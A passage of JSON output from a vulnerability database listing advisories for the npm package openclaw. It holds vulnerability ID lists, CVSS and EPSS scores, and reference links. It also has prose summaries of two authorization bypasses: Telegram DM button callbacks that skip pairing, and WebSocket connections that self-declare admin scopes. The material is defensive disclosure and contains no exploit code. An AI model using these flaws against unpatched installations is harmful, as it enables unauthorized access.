vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41375","GHSA-h2v7-xc88-xx8c"],"risk_score":3.2,"exploitability":"0.5","weighted_severity":"6.4","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tf28-1z2z-5yfn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91270?format=json","vulnerability_id":"VCID-tk9h-nqrz-uugp","summary":"OpenClaw: Telegram DM-Scoped Inline Button Callbacks Bypass DM Pairing and Mutate Session State\n## Summary\n\nTelegram DM-Scoped Inline Button Callbacks Bypass DM Pairing and Mutate Session State\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nTelegram callback queries from direct messages previously used weaker callback-only authorization and could mutate session state without satisfying normal DM pairing. Commit `269282ac69ab6030d5f30d04822668f607f13065` enforces DM authorization for callbacks.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `269282ac69ab6030d5f30d04822668f607f13065`.\n\n## Fix Commit(s)\n\n- `269282ac69ab6030d5f30d04822668f607f13065`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35661","reference_id":"","reference_type":"","scores":[{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.17545","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.175","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.17539","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35661"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/269282ac69ab6030d5f30d04822668f607f13065","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:14:55Z/"}],"url":"https://github.com/openclaw/openclaw/commit/269282ac69ab6030d5f30d04822668f607f13065"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-j4c9-w69r-cw33","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:14:55Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-j4c9-w69r-cw33"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35661","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35661"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-telegram-dm-scoped-inline-button-callback-authorization-bypass","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:14:55Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-telegram-dm-scoped-inline-button-callback-authorization-bypass"},{"reference_url":"https://github.com/advisories/GHSA-j4c9-w69r-cw33","reference_id":"GHSA-j4c9-w69r-cw33","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j4c9-w69r-cw33"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-35661","GHSA-j4c9-w69r-cw33"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tk9h-nqrz-uugp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91491?format=json","vulnerability_id":"VCID-tkxh-m458-6ydw","summary":"Duplicate Advisory: OpenClaw: WebSocket shared-auth connections could self-declare elevated scopes\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-rqpp-rjj8-7wv8. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw versions prior to 2026.3.12 contain an authorization bypass vulnerability in the WebSocket connect path that allows shared-token or password-authenticated connections to self-declare elevated scopes without server-side binding. Attackers can exploit this logic flaw to present unauthorized scopes such as operator.admin and perform admin-only gateway operations.","references":[{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rqpp-rjj8-7wv8","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rqpp-rjj8-7wv8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22172","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22172"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-scope-elevation-in-websocket-shared-auth-connections","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-scope-elevation-in-websocket-shared-auth-connections"},{"reference_url":"https://github.com/advisories/GHSA-x49q-fhhm-r9jf","reference_id":"GHSA-x49q-fhhm-r9jf","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x49q-fhhm-r9jf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"V